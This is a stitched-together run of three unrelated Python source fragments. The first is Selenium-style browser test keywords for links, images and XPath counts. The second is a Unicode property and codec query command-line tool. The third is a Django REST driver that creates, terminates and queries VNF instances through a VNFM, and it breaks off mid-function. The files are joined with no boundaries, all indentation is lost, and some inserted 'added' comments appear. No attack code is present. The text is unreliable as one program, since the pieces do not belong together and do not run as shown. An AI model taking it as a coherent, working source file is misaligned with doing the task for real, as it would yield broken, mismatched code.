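# Added note (illustrative): a `key` given as "\\<code>" is translated through
# _map_ascii_key_code_to_key() below, e.g. Press Key with "\\13" resolves to
# Keys.ENTER before send_keys() is called; codes missing from the map fall back
# to chr(code).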
# Public, links
def click_link(self, locator):
"""Clicks a link identified by locator.
Key attributes for links are `id`, `name`, `href` and link text. See
`introduction` for details about locating elements.
"""
self._info("Clicking link '%s'." % locator)
link = self._element_find(locator, True, True, tag='a')
link.click()
def get_all_links(self):
"""Returns a list containing ids of all links found in current page.
If a link has no id, an empty string will be in the list instead.
"""
links = []
for anchor in self._element_find("tag=a", False, False, 'a'):
links.append(anchor.get_attribute('id'))
return links
def mouse_down_on_link(self, locator):
"""Simulates a mouse down event on a link.
Key attributes for links are `id`, `name`, `href` and link text. See
`introduction` for details about locating elements.
"""
element = self._element_find(locator, True, True, 'link')
ActionChains(self._current_browser()).click_and_hold(element).perform()
def page_should_contain_link(self, locator, message='', loglevel='INFO'):
"""Verifies link identified by `locator` is found from current page.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
Key attributes for links are `id`, `name`, `href` and link text. See
`introduction` for details about locating elements.
"""
self._page_should_contain_element(locator, 'link', message, loglevel)
def page_should_not_contain_link(self, locator, message='', loglevel='INFO'):
"""Verifies image identified by `locator` is not found from current page.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
Key attributes for links are `id`, `name`, `href` and link text. See
`introduction` for details about locating elements.
"""
self._page_should_not_contain_element(locator, 'link', message, loglevel)
# Public, images
def click_image(self, locator):
"""Clicks an image found by `locator`.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
self._info("Clicking image '%s'." % locator)
element = self._element_find(locator, True, False, 'image')
if element is None:
# A form may have an image as its submit trigger.
element = self._element_find(locator, True, True, 'input')
element.click()
def mouse_down_on_image(self, locator):
"""Simulates a mouse down event on an image.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
element = self._element_find(locator, True, True, 'image')
ActionChains(self._current_browser()).click_and_hold(element).perform()
def page_should_contain_image(self, locator, message='', loglevel='INFO'):
"""Verifies image identified by `locator` is found from current page.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
self._page_should_contain_element(locator, 'image', message, loglevel)
def page_should_not_contain_image(self, locator, message='', loglevel='INFO'):
"""Verifies image identified by `locator` is found from current page.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
self._page_should_not_contain_element(locator, 'image', message, loglevel)
# Public, xpath
def get_matching_xpath_count(self, xpath):
"""Returns number of elements matching `xpath`
If you wish to assert the number of matching elements, use
`Xpath Should Match X Times`.
"""
count = len(self._element_find("xpath=" + xpath, False, False))
return str(count)
def xpath_should_match_x_times(self, xpath, expected_xpath_count, message='', loglevel='INFO'):
"""Verifies that the page contains the given number of elements located by the given `xpath`.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
"""
actual_xpath_count = len(self._element_find("xpath=" + xpath, False, False))
if int(actual_xpath_count) != int(expected_xpath_count):
if not message:
message = "Xpath %s should have matched %s times but matched %s times"\
%(xpath, expected_xpath_count, actual_xpath_count)
self.log_source(loglevel)
raise AssertionError(message)
self._info("Current page contains %s elements matching '%s'."
% (actual_xpath_count, xpath))
# Private
def _element_find(self, locator, first_only, required, tag=None):
browser = self._current_browser()
elements = self._element_finder.find(browser, locator, tag)
if required and len(elements) == 0:
raise ValueError("Element locator '" + locator + "' did not match any elements.")
if first_only:
if len(elements) == 0: return None
return elements[0]
return elements
def _frame_contains(self, locator, text):
browser = self._current_browser()
element = self._element_find(locator, True, True)
browser.switch_to_frame(element)
self._info("Searching for text from frame '%s'." % locator)
found = self._is_text_present(text)
browser.switch_to_default_content()
return found
def _get_text(self, locator):
element = self._element_find(locator, True, False)
if element is not None:
return element.text
return None
def _get_value(self, locator, tag=None):
element = self._element_find(locator, True, False, tag=tag)
return element.get_attribute('value') if element is not None else None
def _is_enabled(self, locator):
element = self._element_find(locator, True, True)
if not self._is_form_element(element):
raise AssertionError("ERROR: Element %s is not an input." % (locator))
if not element.is_enabled():
return False
read_only = element.get_attribute('readonly')
if read_only == 'readonly' or read_only == 'true':
return False
return True
def _is_text_present(self, text):
locator = "xpath=//*[contains(., %s)]" % utils.escape_xpath_value(text);
return self._is_element_present(locator)
def _is_visible(self, locator):
element = self._element_find(locator, True, False)
if element is not None:
return element.is_displayed()
return None
def _map_ascii_key_code_to_key(self, key_code):
map = {
0: Keys.NULL,
8: Keys.BACK_SPACE,
9: Keys.TAB,
10: Keys.RETURN,
13: Keys.ENTER,
24: Keys.CANCEL,
27: Keys.ESCAPE,
32: Keys.SPACE,
42: Keys.MULTIPLY,
43: Keys.ADD,
44: Keys.SEPARATOR,
45: Keys.SUBTRACT,
56: Keys.DECIMAL,
57: Keys.DIVIDE,
59: Keys.SEMICOLON,
61: Keys.EQUALS,
127: Keys.DELETE
}
key = map.get(key_code)
if key is None:
key = chr(key_code)
return key
def _parse_attribute_locator(self, attribute_locator):
parts = attribute_locator.rpartition('@')
if len(parts[0]) == 0:
raise ValueError("Attribute locator '%s' does not contain an element locator." % (attribute_locator))
if len(parts[2]) == 0:
raise ValueError("Attribute locator '%s' does not contain an attribute name." % (attribute_locator))
return (parts[0], parts[2])
def _is_element_present(self, locator, tag=None):
return (self._element_find(locator, True, False, tag=tag) is not None)
def _page_contains(self, text):
browser = self._current_browser()
browser.switch_to_default_content()
if self._is_text_present(text):
return True
subframes = self._element_find("xpath=//frame|//iframe", False, False)
self._debug('Current frame has %d subframes' % len(subframes))
for frame in subframes:
browser.switch_to_frame(frame)
found_text = self._is_text_present(text)
browser.switch_to_default_content()
if found_text:
return True
return False
def _page_should_contain_element(self, locator, tag, message, loglevel):
element_name = tag if tag is not None else 'element'
if not self._is_element_present(locator, tag):
if not message:
message = "Page should have contained %s '%s' but did not"\
% (element_name, locator)
self.log_source(loglevel)
raise AssertionError(message)
self._info("Current page contains %s '%s'." % (element_name, locator))
def _page_should_not_contain_element(self, locator, tag, message, loglevel):
element_name = tag if tag is not None else 'element'
if self._is_element_present(locator, tag):
if not message:
message = "Page should not have contained %s '%s'"\
% (element_name, locator)
self.log_source(loglevel)
raise AssertionError(message)
self._info("Current page does not contain %s '%s'."
% (element_name, locator))
import sys
from quex.engine.misc.file_in import error_msg
from quex.engine.utf8 import map_unicode_to_utf8
from quex.engine.interval_handling import NumberSet, Interval
from quex.engine.unicode_db.parser import ucs_property_db
from quex.exception import RegularExpressionException
from quex.input.command_line.GetPot import GetPot
import quex.input.regular_expression.core as regular_expression
import quex.engine.codec_db.core as codec_db
from quex.blackboard import setup as Setup
OPTION_DB = {
"--codec-info": ["Information about supported characters of a codec."],
"--codec-file-info": ["Information about supported characters of a codec file."],
"--codec-for-language": ["Lists possible codecs for a given language."],
"--property": ["Querying properties"],
"--set-by-property": ["Determining character set by property"],
"--set-by-expression": ["Determining character set by property"],
"--property-match": ["Find property values that match wildcards"],
"--numeric": ["Display sets numerically", ["--set-by-property", "--set-by-expression"]],
"--intervals": ["Display sets by intervals", ["--set-by-property", "--set-by-expression"]],
"--names": ["Display unicode names", ["--set-by-property", "--set-by-expression"]],
}
def get_supported_command_line_option_description():
txt = ""
for key, description in OPTION_DB.items():
txt += " " + key
if len(description) >= 2:
txt += " (only with "
txt += repr(description[1])[1:-1]
txt += ")"
txt += "\n"
return txt
def search_and_validate(CL, Option):
if CL.search(Option) == False: return False
# Validate command line
ufos = CL.unidentified_options(OPTION_DB.keys())
if len(ufos) != 0:
error_msg("Unidentified option(s) = " + repr(ufos) + "\n" + \
get_supported_command_line_option_description())
return True
def do(ARGV):
"""Performs a query based on the given command line arguments.
RETURNS: True if a query was performed.
False if no query was requested.
"""
cl = GetPot(ARGV, SectionsEnabledF=False)
success_f = False
# Regular Expressions extract the BufferLimitCode and the PathTerminatorCode
# from the sets. So let us define them outside the normal range.
backup_buffer_limit_code = Setup.buffer_limit_code
backup_path_limit_code = Setup.path_limit_code
Setup.buffer_limit_code = -1
Setup.path_limit_code = -1
try:
success_f = True
if search_and_validate(cl, "--codec-info"): __handle_codec(cl)
elif search_and_validate(cl, "--codec-file-info"): __handle_codec_file(cl)
elif search_and_validate(cl, "--codec-for-language"): __handle_codec_for_language(cl)
elif search_and_validate(cl, "--property"): __handle_property(cl)
elif search_and_validate(cl, "--set-by-property"): __handle_set_by_property(cl)
elif search_and_validate(cl, "--set-by-expression"): __handle_set_by_expression(cl)
elif search_and_validate(cl, "--property-match"): __handle_property_match(cl)
else: success_f = False
except RegularExpressionException, x:
error_msg(x.message)
Setup.buffer_limit_code = backup_buffer_limit_code
Setup.path_limit_code = backup_path_limit_code
return success_f
def __handle_codec(cl):
codec_name = cl.follow("", "--codec-info")
supported_codec_list = codec_db.get_supported_codec_list(IncludeAliasesF=True)
if codec_name == "":
txt = "Missing argument after '--codec-info'. Supported codecs are:\n\n"
line_txt = ""
for name in supported_codec_list:
line_txt += name + ", "
if len(line_txt) > 50: txt += line_txt + "\n"; line_txt = ""
txt += line_txt
txt = txt[:-2] + "."
error_msg(txt)
character_set = codec_db.get_supported_unicode_character_set(CodecAlias=codec_name)
__display_set(character_set, cl)
print
print "Codec is designed for:"
print repr(codec_db.get_supported_language_list(codec_name))[1:-1]
def __handle_codec_file(cl):
file_name = cl.follow("", "--codec-file-info")
character_set = codec_db.get_supported_unicode_character_set(FileName=file_name)
__display_set(character_set, cl)
def __handle_codec_for_language(cl):
language_name = cl.follow("", "--codec-for-language")
supported_language_list = codec_db.get_supported_language_list()
if language_name == "":
txt = "Missing argument after '--codec-for-language'. Supported languages are:\n\n"
line_txt = ""
for name in supported_language_list:
line_txt += name + ", "
if len(line_txt) > 50: txt += line_txt + "\n"; line_txt = ""
txt += line_txt
txt = txt[:-2] + "."
error_msg(txt)
print "Possible Codecs: " + repr(codec_db.get_codecs_for_language(language_name))[1:-1]
def __handle_property(cl):
property_follower = cl.follow("", "--property")
if property_follower == "":
# no specific property => display all properties in the database
sys.stderr.write("(please, wait for database parsing to complete)\n")
ucs_property_db.init_db()
print ucs_property_db.get_property_descriptions()
else:
# specific property => display information about it
sys.stderr.write("(please, wait for database parsing to complete)\n")
property = __get_property(property_follower)
if property is None: return True
print property
def __handle_property_match(cl):
property_follower = cl.follow("", "--property-match")
sys.stderr.write("(please, wait for database parsing to complete)\n")
if property_follower == "":
return
fields = map(lambda x: x.strip(), property_follower.split("="))
if len(fields) != 2:
error_msg("Wrong property setting '%s'." % property_follower)
# -- determine name and value
name = fields[0]
wild_card_expression = fields[1]
# -- get the property from the database
property = __get_property(name)
if property is None:
return True
# -- find the character set for the given expression
if property.type == "Binary":
error_msg("Binary property '%s' is not subject to value wild card matching.\n" % property.name)
for value in property.get_wildcard_value_matches(wild_card_expression):
print value
def __handle_set_by_property(cl):
result = cl.follow("", "--set-by-property")
# expect: 'property-name = value'
if result != "":
sys.stderr.write("(please, wait for database parsing to complete)\n")
fields = map(lambda x: x.strip(), result.split("="))
if len(fields) not in [1, 2]:
error_msg("Wrong property setting '%s'." % result)
# -- determine name and value
name = fields[0]
if len(fields) == 2: value = fields[1]
else: value = None
# -- get the property from the database
property = __get_property(name)
if property is None:
return True
# -- find the character set for the given expression
if property.type == "Binary" and value is not None:
error_msg("Binary property '%s' cannot have a value assigned to it.\n" % property.name + \
"Setting ignored. Printing set of characters with the given property.")
character_set = property.get_character_set(value)
if character_set.__class__.__name__ != "NumberSet":
error_msg(character_set)
__display_set(character_set, cl)
def __handle_set_by_expression(cl):
result = cl.follow("", "--set-by-expression")
if result != "":
character_set = regular_expression.parse_character_set("[:" + result + ":]")
__display_set(character_set, cl)
def __display_set(CharSet, cl):
if cl.search("--numeric"): display = "hex"
else: display = "utf8"
CharSet.intersect_with(NumberSet(Interval(0, 0x110000)))
print "Characters:\n",
if cl.search("--intervals"):
__print_set_in_intervals(CharSet, display, 80)
elif cl.search("--names"):
__print_set_character_names(CharSet, display, 80)
else:
__print_set_single_characters(CharSet, display, 80)
print
def __get_property(Name_or_Alias):
ucs_property_db.init_db()
property = ucs_property_db[Name_or_Alias]
if property.__class__.__name__ != "PropertyInfo":
print property
if Name_or_Alias.find("=") != -1:
print "Use command line option `--set-by-property` to investigate property settings."
if Name_or_Alias.find("(") != -1:
print "Use command line option `--set-by-expression` to investigate character set operations."
return None
property.init_code_point_db()
return property
def __print_set_in_intervals(CharSet, Display, ScreenWidth):
assert Display in ["hex", "utf8"]
interval_list = CharSet.get_intervals(PromiseToTreatWellF=True)
txt = ""
line_size = 0
for interval in interval_list:
interval_string = interval.get_string(Display, "-") + ", "
interval_string_length = len(interval_string)
if line_size + interval_string_length > ScreenWidth:
txt += "\n"
line_size = 0
else:
line_size += interval_string_length
txt += interval_string
print txt
def __print_set_character_names(CharSet, Display, ScreenWidth):
for interval in CharSet.get_intervals(PromiseToTreatWellF=True):
for code_point in range(interval.begin, interval.end):
print "%06X: %s" % (code_point, ucs_property_db.map_code_point_to_character_name(code_point))
class CharacterList:
def __init__(self, CharacterSet):
interval_list = CharacterSet.get_intervals(PromiseToTreatWellF=True)
interval_list.sort(lambda x, y: cmp(x.begin, y.begin))
self.__interval_list = interval_list
self.__interval_list_size = len(interval_list)
if self.__interval_list_size == 0:
self.__current_character = None
self.__current_interval_i = -1
else:
# No character below 0 --> take first interval with .end >= 0
for i in range(self.__interval_list_size):
if self.__interval_list[i].end >= 0: break
self.__current_character = max(0, self.__interval_list[i].begin)
self.__current_interval_i = i
def is_empty(self):
return self.__interval_list_size == 0
def next(self):
tmp = self.__current_character
if tmp is None: return None
# Prepare the character for the next call
self.__current_character += 1
if self.__current_character == self.__interval_list[self.__current_interval_i].end:
self.__current_interval_i += 1
if self.__current_interval_i == self.__interval_list_size:
self.__current_character = None # End reached
else:
self.__current_character = self.__interval_list[self.__current_interval_i].begin
# Return the character that was still to be treated (before advancing)
return tmp
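# Added illustrative sketch (uses only the NumberSet/Interval API imported above):
# CharacterList yields the code points of a set one at a time, treating intervals
# as half-open [begin, end), e.g.
#
#     cl = CharacterList(NumberSet(Interval(0x41, 0x44)))
#     # successive cl.next() calls return 0x41, 0x42, 0x43 and finally None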
def __print_set_single_characters(CharSet, Display, ScreenWidth):
assert Display in ["hex", "utf8"]
if Display == "hex":
CharactersPerLine = 8
ColumnWidth = 6
else:
CharactersPerLine = 32
ColumnWidth = 2
# just to make sure ...
character_list = CharacterList(CharSet)
if character_list.is_empty():
sys.stdout.write("<Result = Empty Character Set>\n")
return
# Avoid memory overflow for very large sets: get character by character
last_start_character_of_line = -1
last_horizontal_offset = 0
while 1 + 1 == 2:
character_code = character_list.next()
if character_code is None: break
start_character_of_line = character_code - character_code % CharactersPerLine
horizontal_offset = character_code - start_character_of_line
if start_character_of_line > last_start_character_of_line + CharactersPerLine:
sys.stdout.write("\n...")
if start_character_of_line != last_start_character_of_line:
sys.stdout.write("\n%05X: " % start_character_of_line)
last_horizontal_offset = 0
sys.stdout.write(" " * ColumnWidth * (horizontal_offset - last_horizontal_offset - 1))
if Display == "hex":
sys.stdout.write("%05X " % character_code)
else:
if character_code >= 0x20:
sys.stdout.write("%s " % map_unicode_to_utf8(character_code))
else:
sys.stdout.write("? ")
last_start_character_of_line = start_character_of_line
last_horizontal_offset = horizontal_offset
# Copyright 2017 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import logging
import time
import traceback
from rest_framework.decorators import api_view
from rest_framework.response import Response
from driver.pub.utils import restcall
from driver.pub.utils.restcall import req_by_msb
from rest_framework import status
# ==================================================
vnf_create_url = "openoapi/vnflcm/v1/vnf_instances"
vnf_inst_url = "openoapi/vnflcm/v1/vnf_instances/%s/instantiate"
vnf_delete_url = "openoapi/vnflcm/v1/vnf_instances/%s"
vnf_terminate_url = "openoapi/vnflcm/v1/vnf_instances/%s/terminate"
operation_status_url = "openoapi/vnflcm/v1/vnf_lc_ops/%s?responseId=%s"
vnf_detail_url = "openoapi/vnflcm/v1/vnf_instances/%s"
EXTSYS_GET_VNFM = "openoapi/extsys/v1/vnfms/%s"
vnf_query_url = "openoapi/vnflcm/v1/vnf_instances/%s"
notify_url = 'openoapi/nslcm/v1/ns/{vnfmid}/vnfs/{vnfInstanceId}/Notify'
query_vnf_resp_mapping = {
"vnfInstanceId": "",
"vnfInstanceName": "",
"vnfInstanceDescription": "",
"vnfdId": "",
"vnfPackageId":"",
"version":"",
"vnfProvider":"",
"vnfType":"",
"vnfStatus":""
}
logger = logging.getLogger(__name__)
def mapping_conv(keyword_map, rest_return):
resp_data = {}
for param in keyword_map:
if keyword_map[param]:
if isinstance(keyword_map[param], dict):
resp_data[param] = mapping_conv(keyword_map[param], ignorcase_get(rest_return, param))
else:
resp_data[param] = ignorcase_get(rest_return, param)
return resp_data
def fun_name():
return "=================%s==================" % inspect.stack()[1][3]
def ignorcase_get(args, key):
if not key:
return ""
if not args:
return ""
if key in args:
return args[key]
for old_key in args:
if old_key.upper() == key.upper():
return args[old_key]
return ""
def set_createvnf_params(data):
input_data = {}
input_data["vnfdId"] = ignorcase_get(data,"vnfDescriptorId")
input_data["vnfInstanceName"] = ignorcase_get(data, "vnfInstanceName")
input_data["vnfInstanceDescription"] = ignorcase_get(data, "vnfInstanceDescription")
return input_data
def set_instantvnf_params(data):
input_data = {}
input_data["flavourId"] = ignorcase_get(data, "flavourId")
input_data["extVirtualLinks"] = ignorcase_get(data, "extVirtualLink")
input_data["additionalParams"] = ignorcase_get(data,"additionalParam")
input_data["flavourId"] = ignorcase_get(data,"flavourId")
return input_data
def set_terminatevnf_params(data):
input_data = {}
input_data["terminationType"] = ignorcase_get(data,"terminationType")
input_data["gracefulTerminationTimeout"] = ignorcase_get(data,"gracefulTerminationTimeout")
return input_data
def set_deletevnf_params(data):
pass
def get_inst_levelId(vnfdId):
inst_levelId = 0
return inst_levelId
def get_vnfm_info(vnfm_id):
ret = req_by_msb((EXTSYS_GET_VNFM) % vnfm_id, "GET")
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
vnfm_info = json.JSONDecoder().decode(ret[1])
logger.debug("[%s] vnfm_info=%s", fun_name(), vnfm_info)
return 0, vnfm_info
# Query VNFM by VNFMID
def vnfm_get(vnfmid):
ret = req_by_msb("openoapi/extsys/v1/vnfms/%s" % vnfmid, "GET")
return ret
def call_vnfm_rest(vnfm_info, input_data, res_url, call_method = "post"):
ret = restcall.call_req(
base_url=ignorcase_get(vnfm_info, "url"),
user=ignorcase_get(vnfm_info, "userName"),
passwd=ignorcase_get(vnfm_info, "password"),
auth_type=restcall.rest_no_auth,
resource=res_url,
method=call_method,
content=json.JSONEncoder().encode(input_data))
return ret
def call_vnfm_createvnf(vnfm_info, input_data):
return call_vnfm_rest(vnfm_info, input_data, vnf_create_url)
def call_vnfm_instvnf(vnfm_info, input_data, vnfInstanceId):
return call_vnfm_rest(vnfm_info, input_data, vnf_inst_url % vnfInstanceId, "post")
def call_vnfm_terminatevnf(vnfm_info, input_data, vnfInstanceId):
return call_vnfm_rest(vnfm_info, input_data, vnf_terminate_url % vnfInstanceId, "post")
def call_vnfm_deletevnf(vnfm_info, vnfInstanceId):
return call_vnfm_rest(vnfm_info, None, vnf_delete_url % vnfInstanceId, "delete")
def call_vnfm_queryvnf(vnfm_info,vnfInstanceId):
return call_vnfm_rest(vnfm_info, None, vnf_query_url % vnfInstanceId, "get")
def call_vnfm_operation_status(vnfm_info, jobId, responseId = None):
return call_vnfm_rest(vnfm_info, None, operation_status_url % (jobId, responseId), "get")
"""
def wait4job(vnfm_id,jobId,gracefulTerminationTimeout):
begin_time = time.time()
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return 255, Response(data={"error":"Fail to get VNFM!"}, status=status.HTTP_412_PRECONDITION_FAILED)
responseId = None
while ret == 0:
cur_time = time.time()
if gracefulTerminationTimeout and (cur_time - begin_time > gracefulTerminationTimeout):
return 255, Response(data={"error":"Fail to terminate VNF!"}, status=status.HTTP_408_REQUEST_TIMEOUT)
ret = call_vnfm_operation_status(vnfm_info,jobId,responseId)
if ret[0] != 0:
return 255, Response(data={"error":"Fail to get job status!"}, status=status.HTTP_412_PRECONDITION_FAILED)
if json.JSONDecoder().decode(ret[2]) != 200:
return 255, Response(data={"error":"Fail to get job status!"}, status=status.HTTP_412_PRECONDITION_FAILED)
job_info = json.JSONDecoder().decode(ret[1])
logger.info('job_info=%s' % job_info)
responseId = ignorcase_get(ignorcase_get(job_info, "responseDescriptor"), "responseId")
progress = ignorcase_get(ignorcase_get(job_info, "responseDescriptor"), "progress")
if progress == "100":
return 0, Response(data={"success":"success"}, status=status.HTTP_204_NO_CONTENT)
except Exception as e:
logger.error("Error occurred when do_createvnf")
return 255, Response(data={"error":"Exception caught! Fail to get job status!"}, status=status.HTTP_412_PRECONDITION_FAILED)
"""
def wait4job(vnfm_id, job_id, gracefulTerminationTimeout=1200, retry_count=60, interval_second=3):
count = 0
response_id, new_response_id = 0, 0
job_end_normal, job_timeout = False, True
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return 255, Response(data={"error":"Fail to get VNFM!"}, status=status.HTTP_412_PRECONDITION_FAILED)
while count < retry_count:
count = count + 1
time.sleep(interval_second)
#ret = req_by_msb("/openoapi/vnflcm/v1/vnf_lc_ops/%s?responseId=%s" % (job_id, response_id), "GET")
ret = call_vnfm_operation_status(vnfm_info, job_id, response_id)
if ret[0] != 0:
logger.error("Failed to query job: %s:%s", ret[2], ret[1])
continue
job_result = json.JSONDecoder().decode(ret[1])
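# Illustrative shape of job_result (field names taken from the accesses below;
# the values are hypothetical):
#   {"responseDescriptor": {"progress": 100, "responseId": 3,
#                           "statusDescription": "operation finished"}}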
if "responseDescriptor" not in job_result:
logger.error("Job(%s) does not exist.", job_id)
continue
progress = job_result["responseDescriptor"]["progress"]
new_response_id = job_result["responseDescriptor"]["responseId"]
job_desc = job_result["responseDescriptor"]["statusDescription"]
if new_response_id != response_id:
logger.debug("%s:%s:%s", progress, new_response_id, job_desc)
response_id = new_response_id
count = 0
if progress == 255:
job_timeout = False
logger.error("Job(%s) failed: %s", job_id, job_desc)
break
elif progress == 100:
job_end_normal, job_timeout = True, False
logger.info("Job(%s) ended normally", job_id)
return 0, Response(data={"success":"success"}, status=status.HTTP_204_NO_CONTENT)
break
if job_timeout:
logger.error("Job(%s) timeout", job_id)
return 255, Response(data={"error":"Fail to get job status!"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# The polling loop can also end via break when the job reports failure (progress == 255);
# return an error tuple here as well so that callers can always unpack (ret, response).
return 255, Response(data={"error":"Job(%s) failed: %s" % (job_id, job_desc)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def do_createvnf(request, data, vnfm_id):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret, vnfm_info
ret = call_vnfm_createvnf(vnfm_info, data)
logger.debug("[%s] call_req ret=%s", fun_name(), ret)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
resp = json.JSONDecoder().decode(ret[1])
except Exception as e:
logger.error("Error occurred when do_createvnf")
raise e
return 0, resp
def do_instvnf(vnfInstanceId, request, data, vnfm_id):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret, vnfm_info
ret = call_vnfm_instvnf(vnfm_info,data, vnfInstanceId)
logger.debug("[%s] call_req ret=%s", fun_name(), ret)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
resp = json.JSONDecoder().decode(ret[1])
except Exception as e:
logger.error("Error occurred when do_instvnf")
raise e
return 0, resp
def do_terminatevnf(request, data, vnfm_id, vnfInstanceId):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret,vnfm_info
ret = call_vnfm_terminatevnf(vnfm_info, data, vnfInstanceId)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
resp_data = json.JSONDecoder().decode(ret[1])
logger.debug("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred when do_terminatevnf")
raise e
return 0, resp_data
def do_deletevnf(request, vnfm_id, vnfInstanceId):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
input_data = set_deletevnf_params(request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret, vnfm_info
ret = call_vnfm_deletevnf(vnfm_info, vnfInstanceId)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
except Exception as e:
logger.error("Error occurred when do_deletevnf")
raise e
return 0, {}
def do_queryvnf(request, vnfm_id, vnfInstanceId):
logger.debug("[%s] request.data=%s", fun_name(), request.data)
try:
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return ret, vnfm_info
ret = call_vnfm_queryvnf(vnfm_info, vnfInstanceId)
if ret[0] != 0:
return 255, Response(data={'error': ret[1]}, status=ret[2])
resp_data = json.JSONDecoder().decode(ret[1])
logger.debug("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred when do_query vnf")
raise e
return 0, resp_data
@api_view(http_method_names=['POST'])
def instantiate_vnf(request, *args, **kwargs):
try:
input_data = set_createvnf_params(request.data)
vnfm_id = ignorcase_get(kwargs, "vnfmid")
ret, resp = do_createvnf(request, input_data, vnfm_id)
if ret != 0:
return resp
logger.info("[%s]resp_data=%s", fun_name(), resp)
vnfInstanceId = resp["vnfInstanceId"]
logger.info("[%s]vnfInstanceId=%s", fun_name(), vnfInstanceId)
input_data = set_instantvnf_params(request.data)
input_data["vnfmId"] = vnfm_id
ret, resp = do_instvnf(vnfInstanceId, request, input_data, vnfm_id)
if ret != 0:
return resp
resp_data = {"jobId":"", "vnfInstanceId":""}
resp_data["vnfInstanceId"] = vnfInstanceId
resp_data["jobId"] = resp["jobId"]
except Exception as e:
logger.error("Error occurred when instantiating VNF")
raise e
return Response(data=resp_data, status=status.HTTP_201_CREATED)
@api_view(http_method_names=['POST'])
def terminate_vnf(request, *args, **kwargs):
vnfm_id = ignorcase_get(kwargs, "vnfmid")
vnfInstanceId = ignorcase_get(kwargs, "vnfInstanceId")
try:
input_data = set_terminatevnf_params(request.data)
ret, resp = do_terminatevnf(request, input_data, vnfm_id, vnfInstanceId)
if ret != 0:
return resp
jobId = ignorcase_get(resp, "jobId")
gracefulTerminationTimeout = ignorcase_get(request.data, "gracefulTerminationTimeout")
ret, response = wait4job(vnfm_id,jobId,gracefulTerminationTimeout)
if ret != 0:
return response
ret, resp = do_deletevnf(request, vnfm_id, vnfInstanceId)
if ret != 0:
return resp
except Exception as e:
logger.error("Error occurred when terminating VNF")
logger.error(traceback.format_exc())
return Response(data={'error': 'Failed to terminate Vnfs'},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return Response(data=resp, status=status.HTTP_204_NO_CONTENT)
"""
@api_view(http_method_names=['POST'])
def terminate_vnf(request, *args, **kwargs):
try:
logger.debug("[%s] request.data=%s", fun_name(), request.data)
vnfm_id = ignorcase_get(kwargs, "vnfmid")
ret = vnfm_get(vnfm_id)
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
vnfm_info = json.JSONDecoder().decode(ret[1])
logger.debug("[%s] vnfm_info=%s", fun_name(), vnfm_info)
data = {}
logger.debug("[%s]req_data=%s", fun_name(), data)
ret = restcall.call_req(
base_url=ignorcase_get(vnfm_info, "url"),
user=ignorcase_get(vnfm_info, "userName"),
passwd=ignorcase_get(vnfm_info, "password"),
auth_type=restcall.rest_no_auth,
resource=vnf_delete_url % (ignorcase_get(kwargs, "vnfInstanceID")),
method='delete',
content=json.JSONEncoder().encode(data))
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
resp = json.JSONDecoder().decode(ret[1])
resp_data = mapping_conv(vnf_delete_resp_mapping, resp)
logger.debug("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred when terminating VNF")
logger.error(traceback.format_exc())
return Response(data={'error': 'Failed to terminate Vnfs'},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return Response(data=resp_data, status=ret[2])
"""
@api_view(http_method_names=['GET'])
def query_vnf(request, *args, **kwargs):
vnfm_id = ignorcase_get(kwargs, "vnfmid")
vnfInstanceId = ignorcase_get(kwargs, "vnfInstanceId")
try:
logger.debug("[%s] request.data=%s", fun_name(), request.data)
ret, resp = do_queryvnf(request, vnfm_id, vnfInstanceId)
if ret != 0:
return resp
resp_response_data = mapping_conv(query_vnf_resp_mapping, ignorcase_get(resp, "ResponseInfo"))
resp_data = {
"vnfInfo":resp_response_data
}
#Handle vnfSoftwareVersion and vnfStatus specially
resp_data["vnfInfo"]["version"] = ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "vnfSoftwareVersion")
if ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "instantiationState"):
if ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "instantiationState") == "INSTANTIATED":
resp_data["vnfInfo"]["vnfStatus"] = "ACTIVE"
